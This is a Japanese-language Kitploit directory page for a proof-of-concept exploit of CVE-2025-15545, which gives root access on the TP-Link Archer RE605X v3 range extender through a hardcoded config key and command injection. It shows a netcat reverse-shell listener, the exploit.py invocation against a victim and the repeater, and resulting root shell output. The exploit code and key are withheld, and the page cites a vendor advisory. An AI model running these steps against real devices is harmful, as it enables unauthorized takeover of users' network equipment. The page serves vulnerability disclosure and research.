Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-15545 — CVE-2025-15545 の概念実証 | Kitploit
ツール/GitHubGitHub/xernary/cve-2025-15545
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトリバースエンジニアリングコマンド&コントロール
GitHubxernary/cve-2025-15545

CVE-2025-15545

CVE-2025-15545 の概念実証

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-15545

情報

ベンダー: TP-Link
ベンダーのウェブサイト: TP-Link
モデル: Archer RE605X
ハードウェアバージョン: RE605X v3.0
ファームウェアバージョン: RE605X(EU)_V3_1.1.5 Build 20240905
ファームウェアダウンロードアドレス: TP-Link

一連の脆弱性(ハードコードされた暗号鍵の使用やXML設定パーサーコンポーネントにおけるコマンドインジェクションを含む)により、ローカルの認証された攻撃者がデバイス上でroot権限でリモートコード実行(RCE)を達成することが可能になります。

PoCの要件

注: exploit.pyの概念実証はチェーン攻撃シナリオを示しており、追加の前提条件として認証されたユーザーの資格情報に依存しています。この認証ステップはCVE-2025-15545の対象外であり、デモンストレーション目的でのみ含まれています。

  • 攻撃者と被害者の両方がリピーターのローカルネットワークに接続されている必要があります。
  • 被害者はリピーターのWebコントロールパネルに認証されている必要があります。

使用方法

別の端末で着信接続を待機します:

root@kitploit:~
$ nc -lvnp 4444

exploit.pyスクリプトを実行します:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

注: aes_keyとaes_ivは、デバイスが設定ファイルの暗号化と復号化に使用するハードコードされた暗号鍵であり、この概念実証に必要です。セキュリティ上の理由からここでは共有できません。

最初の端末でリバースシェルを受信します:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

参考文献

これらの脆弱性はNicola Giuffridaによって報告されました。

  • 完全な解説: https://nico-security.com/posts/cve-2025-15545
  • CVEレコード: https://www.cve.org/cverecord?id=CVE-2025-15545
  • TP-Linkのアドバイザリ: https://www.tp-link.com/us/support/faq/4929
ツールをダウンロード